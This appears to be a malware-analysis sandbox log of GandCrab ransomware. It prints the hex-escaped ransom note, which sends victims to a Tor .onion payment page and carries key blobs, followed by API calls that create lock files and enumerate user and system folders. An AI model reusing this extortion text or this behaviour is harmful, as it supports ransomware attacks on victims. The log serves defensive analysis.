\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.909] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0080.909] CloseHandle (hObject=0x2dc) returned 1 [0080.910] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.910] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.910] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1a, wMilliseconds=0xda)) [0080.910] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.910] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.911] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.911] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock") returned 127 [0080.911] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0080.912] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.912] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\") returned 103 [0080.912] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*" [0080.912] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503838 [0080.913] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.913] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0080.913] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.913] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0080.913] lstrcmpW (lpString1="2017-05", lpString2=".") returned 1 [0080.913] lstrcmpW (lpString1="2017-05", lpString2="..") returned 1 [0080.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="2017-05" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05" [0080.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\" [0080.913] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.914] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.914] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.914] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.914] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.914] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.915] 